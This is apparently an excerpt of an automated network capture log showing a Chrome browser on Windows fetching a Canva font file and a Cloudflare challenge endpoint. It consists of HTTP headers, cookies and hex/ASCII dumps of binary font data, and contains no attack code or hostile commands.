                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: d5 33 a4 14 7d fc 7b 27 51 59 ec 3e 00 ea f9 06 aa 7c 9c cf de e7 34 91 bc 58 67 51 e4 ca 07 63 2a 81 fa 18 4e bc e9 ed 36 50 52 bd e2 4d 12 90 e4 7d 02 9a 7c 48 c0 92 4f 9a e0 13 3e 9b 2c f9 76 79 8b 3c f9 7d 69 45 35 d5 f8 9c 5e 69 bf a3 2d cb f9 19 5d 82 3c db 42 00 f6 ff 26 fe 9d ff e5 ff d2 df f9 7f fd 90 39 30 76 80 13 7e bf fb 09 80 07 7c 75 63 4d cf cb 0c 33 a9 e1 9c 65 23 12 34 1f f7 55 58 7e 76 1b 8f bc b2 02 77 72 9a 02 8a 0f 92 71 9f c3 01 4a 90 67 00 bb be 1e bf 9c 0c 9f f7 7d 68 7d 3e d5 e9 e5 a4 aa 92 ec b8 8d 5b f8 f0 aa f3 11 66 20 44 80 50 17 a7 1a 54 41 05 54 4a 1c 09 42 9e 3a 3d 35 82 3e 57 6d de 9a c2 72 f5 fb 51 96 1c b8 72 bc 9b 5e f3 53 82 0d 26 da 8d 2c bc 98 b2 43 84 aa 23 e4 5a 69 24 f5 4e 66 52 96 e0 2e ce 81 34 29 21 cd fe 6d
                                                                                                                                                                                                                                                    Data Ascii: 3}{'QY>|4XgQc*N6PRM}|HO>,vy<}iE5^i-]<B&90v~|ucM3e#4UX~vwrqJg}h}>[f DPTATJB:=5>WmrQr^S&,C#Zi$NfR.4)!m
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 56 d9 aa d0 1f 59 25 32 29 ee 2a b8 94 a8 82 47 86 93 fc 82 76 07 86 8e 08 09 b3 47 16 76 7b 23 33 53 0b 03 d5 4a 85 f4 0b 00 6a 58 b1 d5 c6 fa 10 00 01 10 84 2a 75 22 10 04 2b ff 54 1e 24 35 65 0a 7f 03 ba eb ea de f4 97 99 ee 57 f5 60 10 a3 74 ca a8 0a df a0 8d b9 88 78 c7 17 19 a9 01 26 8c e3 4c ef b6 5e 4c 53 c7 23 a1 d1 70 7b 52 ae c2 d5 d0 bd be a7 7a 5e 81 3c 9d ec ab 67 0c 33 82 c2 d3 18 ea d9 95 64 7f 40 45 67 37 86 d9 30 13 13 8b 7b 2f 65 5d ee 65 ec 66 2d ba a4 0d 55 4f 2f f5 25 09 99 2a 0a 42 f4 30 c7 12 5b 75 7a ca 2a 27 9d a6 2c b8 73 07 06 87 03 22 e9 a2 a9 5a 37 d2 d5 eb 75 f6 aa 63 98 68 76 19 8a 91 5f 7d 62 b8 91 c2 24 b7 e9 d0 80 17 47 de a2 fa 8e 21 46 9c 60 e7 39 6b 57 7b 07 ec 94 31 8e 1d a1 66 35 e7 aa bf 63 d7 30 ee 08 ec d5 d2 95
                                                                                                                                                                                                                                                    Data Ascii: VY%2)*GvGv{#3SJjX*u"+T$5eW`tx&L^LS#p{Rz^<g3d@Eg70{/e]ef-UO/%*B0[uz*',s"Z7uchv_}b$G!F`9kW{1f5c0
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: 76 b2 ed c0 61 fb 7a ed 3a 70 d0 a1 33 c7 79 2e b0 a4 6b 93 22 31 08 64 92 2a b9 79 73 6d ab 1a 8f 7e fa d9 0b fc f6 bb 17 fa ef bf 5e 86 f5 96 7f 55 6b 1b a1 38 e4 58 c7 ba b9 08 71 13 e2 21 1f 2c 71 42 bc 84 f8 08 99 39 53 fe 81 57 48 bc fc e3 95 1e ea 80 1d ea 6e 8a 4c 31 c0 4d e3 f6 6e 88 54 77 96 50 40 19 35 34 a5 73 15 43 d2 a7 72 cc 3d 31 f2 53 04 73 bf 4a f4 1f de 9b 04 60 91 ef 6f 89 cb 89 c5 5b e0 94 ed 95 c6 99 f6 78 ef 8f fb 10 02 7f 0f 76 e0 c6 31 fa ae 9b 1e 2e 73 f0 8e ce d3 ce 08 30 c9 d2 5c 48 6a 98 9e 03 18 6b c9 87 92 99 d7 87 5d a5 e4 a6 f8 e8 a4 40 0c 48 17 50 48 c3 58 67 49 1a eb 42 d2 04 76 5f 34 a4 e9 6b a9 a9 cb 1c a1 97 e6 70 81 51 5a c4 1d 66 69 85 08 ac c4 83 ac d2 3a d1 b0 4b 5b c4 e5 59 63 75 13 17 06 24 ca 6b a4 14 7b 90 74
                                                                                                                                                                                                                                                    Data Ascii: vaz:p3y.k"1d*ysm~^Uk8Xq!,qB9SWHnL1MnTwP@54sCr=1SsJ`o[xv1.s0\Hjk]@HPHXgIBv_4kpQZfi:K[Ycu$k{t
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC1369INData Raw: a7 b5 59 2d ea ba 6e cb b8 1c bf 7d a4 c8 2f f2 e8 af b4 1a 40 43 11 44 12 59 39 a2 8a d6 b9 da 6c b1 c4 11 b7 5a 58 5d 55 5d 57 dd 54 2d ab 3e 5c ad ac d8 f8 09 7d a8 75 75 c7 36 eb f6 77 b5 ee 37 b3 32 cc 43 41 c6 8d 96 b9 a3 0b 14 15 ae 03 d7 ba 5a 28 13 d6 bc 41 f6 ce 7e 77 fd 13 1b dd a5 c9 99 4a 50 8c 35 77 9b 12 a4 d9 cd 7d 05 6d ba 3b aa d3 fd 1e b1 b7 3f 25 09 54 e0 9a 2b 7b 4f 53 57 bd da ab 9d bc 25 d5 cf 2e 2b d1 c3 0e f5 b9 ee c7 27 28 60 64 15 3c e1 88 c9 2b d4 66 b6 41 ec 02 90 00 3b 48 ae 87 7a 2c a6 a8 79 5d cf 07 ce 8c 7a 29 c1 d3 81 a2 bf 1a e9 42 d1 eb 02 80 06 00 2a 00 e2 b8 6e 17 14 3c f8 1f 3e 71 59 31 7d 74 69 2e 1a 5d fa 20 e5 1f 5e 97 31 35 ca a0 59 ab d6 24 eb 15 e1 ea f4 19 57 00 ca 00 68 05 aa e4 94 3d 27 38 2e 21 a0 44 ad 2c
                                                                                                                                                                                                                                                    Data Ascii: Y-n}/@CDY9lZX]U]WT->\}uu6w72CAZ(A~wJP5w}m;?%T+{OSW%.+'(`d<+fA;Hz,y]z)B*n<>qY1}ti.] ^15Y$Wh='8.!D,


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    54192.168.2.449803104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC636OUTGET /YACgEZ1cb1Q/0/ArimoBold.927b7dca5b947f69cb8e835f7f743d.98c4d2c0223fc8474641c77f923528e9.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:33 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 194064
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a342f7e43df-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1430644
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "bd9b0e8c9f27308a42500f46cab0ba15"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:33 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 22 Dec 2020 02:11:08 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: Euam0n/4L7AJL2xfPEYTlSNVxiv6hsWsotOBpvVo1np1RGgyomdDyOC7oi1B+USMHYYggHqEZDQ=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: 4PC7D2PBQ1GN5W95
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: GH9kUpupw1M52uAOEtYylLzXRPnNuZ2z
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC793INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 59 4c 4e 57 41 6e 63 55 75 6e 75 39 34 36 31 79 55 6e 75 49 42 6d 58 76 34 54 36 73 69 70 71 49 4f 5a 63 59 71 52 5a 75 59 75 55 2d 31 37 33 34 36 34 33 36 35 33 2d 31 2e 30 2e 31 2e 31 2d 59 4b 51 57 6e 65 45 32 4c 57 4d 34 7a 74 2e 48 6b 44 48 44 34 73 42 71 38 66 71 74 66 58 33 62 5a 36 47 38 39 76 51 45 69 6f 4e 53 31 30 63 68 31 63 32 75 74 52 37 71 7a 6c 37 38 51 74 77 6c 5a 74 69 66 56 32 41 78 31 5a 4e 37 6e 4c 68 66 6f 73 71 69 65 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 33 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=YLNWAncUunu9461yUnuIBmXv4T6sipqIOZcYqRZuYuU-1734643653-1.0.1.1-YKQWneE2LWM4zt.HkDHD4sBq8fqtfX3bZ6G89vQEioNS10ch1c2utR7qzl78QtwlZtifV2Ax1ZN7nLhfosqieg; path=/; expires=Thu, 19-Dec-24 21:57:33 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 02 f6 10 00 15 00 00 00 06 b0 f4 00 02 f5 a1 00 01 3b 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 6a 1b 82 9c 12 1c 96 4a 14 94 1c 06 60 16 a3 14 00 94 12 08 85 08 09 8f 34 11 10 ca 90 af 46 12 83 e5 28 01 36 02 24 03 d0 5c 13 aa 5a cb d0 64 04 20 05 8c 4b 07 81 cf 75 0c 89 10 5b 85 af b6 17 fe bf d8 6f e7 be 04 f9 48 ab a4 cc 6e d9 43 25 71 60 ac bf 35 d9 35 a2 99 bf b0 a1 ba 50 f7 6f 91 43 a4 23 d6 40 5d aa ca 87 f3 cc eb 18 a2 13 42 08 54 b5 5b bf 9d 39 12 c9 b8 7b 69 56 41 b7 21 80 56 7b de ab 53 de 48 ac ff ff ff ff ff ff ff ff ff ff ff ff ff ff a6 92 1f f1 6d 3a 33 df 7d 33 fb 77 ff 25 1f 44 40 45 50 40 51 0e 09 68 3c 12 8d e6 d2 5c b6 69 da 12 d4 3c 69 4a ca 02 8b 59 5e 84 b2 aa 28 f8 6d 53 66 14
                                                                                                                                                                                                                                                    Data Ascii: wOF2;#jJ`4F(6$\Zd Ku[oHnC%q`55PoC#@]BT[9{iVA!V{SHm:3}3w%D@EP@Qh<\i<iJY^(mSf
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 94 31 f5 3f be 19 63 3d 7e 9e 77 d3 7f f7 3d 40 d6 92 29 4e 9c d1 a0 e2 1a 38 00 07 2a 28 22 47 40 74 b3 54 c0 81 0b 57 a2 99 66 6c db a4 49 77 92 36 69 ba 4d 97 49 c7 4e c7 1f 6b b7 7f a7 f1 39 44 ba d5 94 2d 29 8d 96 10 90 2e 09 10 8a 48 91 84 52 0f 01 11 82 06 54 9a a8 68 47 10 2b 96 83 60 41 44 8c 58 38 b0 c1 71 8a 80 74 15 1b 2a 56 a4 d9 51 11 1b 88 72 e2 a9 9c f0 be 72 1a 78 78 e2 4f e9 cf 7d 9e 24 6d 52 68 65 76 25 7f 19 dd 6f e0 cd f0 34 b7 bf 63 80 05 82 36 46 a1 7c d1 06 fd 82 1d 7c fb 30 11 93 32 09 ed 7d 04 95 c8 21 28 4a 94 88 93 68 89 01 a3 25 7a 63 6c 6c 0c b6 b1 31 76 0b c6 60 fd 0e 9e 2f 55 73 1e 2e 63 08 f0 44 24 2d b1 0a bb 02 94 70 f7 77 a9 d9 02 fd dd d9 ee 3c bd 3b 70 54 b4 2a 53 d1 3a a1 e8 a9 73 4a b5 dd f4 1c 37 45 82 23 fc f7 ee
                                                                                                                                                                                                                                                    Data Ascii: 1?c=~w=@)N8*("G@tTWflIw6iMINk9D-).HRThG+`ADX8qt*VQrrxxO}$mRhev%o4c6F||02}!(Jh%zcll1v`/Us.cD$-pw<;pT*S:sJ7E#
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 34 f6 fd 4f 5b 2a 85 70 37 40 1b 90 e6 97 0a e3 dd ea 0c 1b 36 49 46 ed 01 55 9e 09 b3 ec ae 78 6b 73 97 16 8b 9e b8 a8 e2 c7 5e 87 7c 76 a3 38 aa 21 1c 3c d6 05 32 8c 2b da 39 74 2b 50 e8 fb dd 81 1a a3 46 6f 5b 20 e8 10 b1 ca 5b 03 48 02 ec a4 9d fb ff 9b aa ef 72 89 70 c3 55 ea 3c 15 63 63 54 30 22 59 a6 e4 f7 75 d4 b0 2d 49 e7 f8 ed f1 3c bd 3f ad ce 13 d8 ad 36 49 6c 73 13 96 a7 a4 c1 c8 37 dd c8 dd 4b d8 bd 90 03 86 5b 9b 02 e7 33 41 b2 d0 60 69 09 ba 26 b2 a6 b6 72 e0 7c 83 64 fe e7 1f 6c f7 df 9d 31 cc 08 25 aa 55 69 fc b7 4d 31 b6 f3 82 90 04 61 09 0a 8d 22 fe 2b 83 a4 5f f8 6a d4 e5 e7 54 83 25 a8 ae f1 3a f6 b9 aa 31 7d 78 7e bf 79 cf bd f7 7d b0 03 ab 37 37 2c 5c 95 91 33 1a c4 89 d1 a4 09 16 56 cd 61 25 18 09 16 7e 2c 74 88 d0 e2 14 83 56 40
                                                                                                                                                                                                                                                    Data Ascii: 4O[*p7@6IFUxks^|v8!<2+9t+PFo[ [HrpU<ccT0"Yu-I<?6Ils7K[3A`i&r|dl1%UiM1a"+_jT%:1}x~y}77,\3Va%~,tV@
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 48 3f de dd 1e 2c 8c 8f 46 68 21 73 3d b2 04 94 ac f7 3a 51 5e 58 7b c3 db 4a 0f d9 21 76 8a 5a d4 57 e8 a9 8b 37 ed 0e bd 16 cb 5a 04 8f 0e 39 f3 6d ab 4e 46 f5 08 66 07 d4 56 04 07 42 25 09 04 fe 80 fc 44 ea 44 ba 46 32 e5 af a3 78 a9 46 0a f9 ec b0 c2 d3 96 4f e6 cd 50 ed 47 a1 22 83 04 f7 17 24 48 10 11 77 db cb b9 e7 fe db af ff ff bd 14 ec 67 f7 11 12 11 9d 39 22 62 23 11 21 12 21 22 22 12 e1 95 88 e8 0e af 37 0c d3 be 77 06 93 ce 25 05 3c 28 14 06 83 c2 c3 c3 2c 5d 5f af aa 8d c2 4e 32 68 45 03 06 0c 18 30 c0 c0 52 0c 2c a5 81 81 81 81 41 03 03 83 56 64 dd b3 92 cd ef 03 60 e0 e7 ef ff d6 fe f9 bf 6b 3b 18 ef d1 1e 39 92 90 88 38 84 84 84 48 88 44 88 44 44 44 c4 b9 f7 7d 7f 87 e7 3f ba f4 3f ce d5 5d 24 81 90 41 60 6c 13 c7 71 1c 87 2c 8f c7 e4 bf
                                                                                                                                                                                                                                                    Data Ascii: H?,Fh!s=:Q^X{J!vZW7Z9mNFfVB%DDF2xFOPG"$Hwg9"b#!!""7w%<(,]_N2hE0R,AVd`k;98HDDDD}??]$A`lq,
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: aa fa cd 44 d4 11 5c c7 64 c8 2a 64 38 ef 2a 44 a2 22 fa e0 cc 75 96 3f db 42 4b fe ec 48 1f dd 28 7a 0d e1 13 41 89 49 42 57 0e 1c 23 26 4c 63 ce 0b 26 f3 4a 6a a9 67 55 be 3d fb ea 62 b0 96 2d 81 79 33 1b 91 bf 9a b5 68 d7 a9 0b 0d cf 30 01 a1 09 2a da c0 ca 01 81 19 9b 6a 9a e9 66 86 d9 52 e9 52 f1 82 3d 9a 9e 93 2c 33 af 3d 66 5d aa d1 5f cd 5a b4 eb d4 85 86 67 98 80 d0 04 15 6d 60 e5 80 c0 8c 4d 35 cd 74 33 c3 ec 06 94 55 7c 99 a0 78 85 bf 96 dc cf ed 65 66 93 f3 6f 94 66 47 ad 25 39 29 8f d9 8b d0 72 08 5a 06 92 0f 2d 2d 29 82 44 53 62 92 15 89 68 54 5d 2d 62 72 82 83 c5 61 94 b6 32 ac 26 0d 35 45 ce 3c 60 32 e7 71 85 40 23 cc 04 06 9c 7c 48 6e 27 13 8a 02 09 e1 20 f0 5b 4f 00 4c b5 5b 39 00 5c a3 bf 9a b5 68 d7 99 5d 29 1a 9e 61 02 42 13 54 b4 81
                                                                                                                                                                                                                                                    Data Ascii: D\d*d8*D"u?BKH(zAIBW#&Lc&JjgU=b-y3h0*jfRR=,3=f]_Zgm`M5t3U|xefofG%9)rZ--)DSbhT]-bra2&5E<`2q@#|Hn' [OL[9\h])aBT
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 58 89 2d cb c6 03 8b af 8e 0d cb d4 d1 c5 67 c7 3c a8 6f 7a f1 8a 98 80 2c 70 e6 a2 d6 5e 3e 87 21 e8 dc db b5 85 ed 3b 9e c7 de 79 60 ea 92 17 7a 96 f4 da f3 ea 57 4c ea 23 dd 28 dd 4e 44 a4 36 22 53 17 51 a9 9b e8 f4 76 1c 23 bd ff c2 f9 f1 11 ac 34 d2 0a 9a f4 ad 95 74 e9 07 6d a8 af 8c 8a d3 53 db 00 53 9a 00 ce 41 b3 68 e0 0a 77 bf f6 a2 54 99 ea 13 3b 37 16 76 a5 5d 65 57 a7 d5 84 9a 2b 85 79 49 c0 20 a4 4a 19 da 7b 16 da 07 10 94 d0 7d 13 0c c8 73 7f 03 80 1a 67 7b a1 7f 43 b2 bb 09 fb a0 ff ba b7 e2 bf 7d 76 2f c6 bb de bb 27 e3 35 af dc 09 79 d1 53 db e7 00 7e e3 ae db 81 9f b9 6d bc b3 08 ba 77 51 d4 df c2 f9 ee 4c 5a ea 16 d5 14 75 35 7d 6a ab 06 b6 e6 d9 6e 9f d8 5a 09 76 9e ad b1 8b 4c 71 dd f4 42 13 89 6f f6 e6 11 3d 24 e2 00 ba 6a 65 b8 8f
                                                                                                                                                                                                                                                    Data Ascii: X-g<oz,p^>!;y`zWL#(ND6"SQv#4tmSSAhwT;7v]eW+yI J{}sg{C}v/'5yS~mwQLZu5}jnZvLqBo=$je
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: f2 ad f5 2c 42 f3 50 0e ef 81 69 d1 6c 16 f7 ac 1a 73 25 95 41 fd 97 a0 7e 7a 77 99 e0 95 06 90 b9 98 05 77 80 77 38 0c 15 9b 2a 94 29 4b d8 31 c1 82 c7 5d 30 8f 61 62 c5 03 5e 36 a7 b2 6b 85 8b 93 d4 57 e9 3d 94 19 eb 96 65 cc eb 77 52 9e b3 79 81 1b ca 92 20 5c 45 87 89 42 57 b1 45 4a 43 e1 b5 d2 5b 04 17 3b 53 4a d7 96 b0 63 8e c1 1a 65 e5 ec b2 db 41 4b f4 c0 82 d7 ed 45 aa d9 cb 02 cd db c2 33 89 f5 f0 45 d5 73 e4 9d a4 91 12 b1 48 80 10 43 28 53 23 39 ae 0a cd 39 4e 2b 1b de 0c 39 4e 07 7f 88 aa aa 0f ce 5e 3b e3 b2 06 ee 12 6d 61 4d 23 a2 9d cc 8a ba de ac ea b1 ce 7e c1 2a 9d 54 38 02 65 cf 69 39 4d 2e ff 93 6b b4 1b c7 39 76 3b b9 49 9d 4f 77 41 ae af ac cb 48 86 32 25 08 4b b9 e2 06 54 03 c0 32 0c bb d5 ac 30 67 01 31 6a fb 16 b1 8b 1b 7c cb bf
                                                                                                                                                                                                                                                    Data Ascii: ,BPils%A~zwww8*)K1]0ab^6kW=ewRy \EBWEJC[;SJceAKE3EsHC(S#99N+9N^;maM#~*T8ei9M.k9v;IOwAH2%KT20g1j|
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: c8 1e 9c 59 2d f9 e4 8d ea 0b ee b4 3a 0a 18 a7 c6 f5 fd 85 fb 50 6b 0a 9c 1c d0 8c 1d dd d1 5d e4 d6 c6 47 94 58 27 c2 28 d4 19 0f 75 da ec a3 59 4d 80 23 f2 11 77 eb cc 82 ef 2e 21 f4 c1 44 57 1f 22 d3 7e f2 cd 8e ef 39 98 d7 62 ae 5a c9 a5 bc ea b1 7f 1d c8 42 3f 78 92 c5 35 ce d7 b8 59 5f 51 5c 14 3a ac b8 1b 6d c0 56 77 d9 f6 72 5b 46 81 07 23 ec bb 9d 41 b0 52 0e 6a 63 55 3f 65 c7 1a 88 0d e6 d0 51 f3 a0 a6 a2 82 74 49 70 26 8d 38 16 a1 5a fe c2 78 1b 1b 8f d6 ad b9 9e af 2e b5 5a 34 a8 b5 51 bf 46 10 50 dc c9 16 7a 2f e6 be ed 47 dd 10 e6 af 0c e9 72 95 c5 e5 1d 11 17 bf 72 71 82 2b 00 ea d9 36 e6 d6 8b c4 b6 aa ee 0a 03 f9 55 6b d0 fa 05 6a 24 a3 5d 52 34 3c 88 0c 47 d0 bc 95 95 ac b8 ca c2 15 be 8a 2f a5 91 05 1a 1a 40 e5 fd ea 83 b8 f0 85 ea 2e
                                                                                                                                                                                                                                                    Data Ascii: Y-:Pk]GX'(uYM#w.!DW"~9bZB?x5Y_Q\:mVwr[F#ARjcU?eQtIp&8Zx.Z4QFPz/Grrq+6Ukj$]R4<G/@.
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1369INData Raw: 9e e0 be 15 1f 5c 3d cb 46 59 d6 71 10 75 b9 80 0f 23 36 45 c2 2b 3e d4 5b ec da 1f 53 2c ec d7 ea 61 29 fd 8e d8 e0 cf 21 76 93 b5 d1 b8 2e 2e bf a2 c6 ab 19 53 ae 82 3f fc 3e f9 5a d2 53 ee 32 7e a4 00 41 f0 7b 77 d2 b2 97 81 f7 c7 16 fc 59 05 b4 dd 46 4b a5 54 1d d0 14 a8 52 87 b5 09 b2 99 ee 9b 56 1d 13 e6 df 81 58 1f ad a7 a3 81 0d 15 d1 eb 0d ff 5c ad e3 74 92 52 f7 ce a3 f9 64 2e 45 1f a7 75 e0 cd ca fe 79 9b d0 39 b6 ef 9f c4 ff fb b8 cc fd 34 2e 8b ff 46 9e f7 ff 93 b9 29 06 50 13 5c 28 58 c4 0a ae ec 23 17 15 27 28 20 9a cb 94 32 8b 27 39 c1 1c 9e a1 8e 58 b6 b8 c0 5c de f3 d8 3c 7e 6e c0 2a 7e e7 a3 f5 fc 1b 92 a1 1d c1 41 01 70 a5 bc a7 e5 20 4f 6e 69 15 38 94 4b ed 12 5c 79 a7 79 3a 2e cf aa 48 25 52 41 b1 45 e6 26 45 a8 78 35 13 60 58 cc 06
                                                                                                                                                                                                                                                    Data Ascii: \=FYqu#6E+>[S,a)!v..S?>ZS2~A{wYFKTRVX\tRd.Euy94.F)P\(X#'( 2'9X\<~n*~Ap Oni8K\yy:.H%RAE&Ex5`X


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    55192.168.2.449806104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:33 UTC1614OUTGET /cdn-cgi/challenge-platform/h/b/jsd/r/8f4a79db8e0a727a HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:34 UTC609INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:34 GMT
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    allow: POST
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xCHfE6oqqKX%2BnNaXna4fbXw%2Bj71IFnd%2BJSY0RSZr8OT9vUS3eOCRiAjleXmjxkcmWTLYq8Ehq8%2FuDV%2BhykrjhZKJQHNTZJPGfPGQQb4UosbgIkuBHrNaI1QFhb%2Bt9V0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7a35583343e2-EWR


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    56192.168.2.44980713.226.2.3443600C:\Program Files\Google\Chrome\Application\chrome.exe
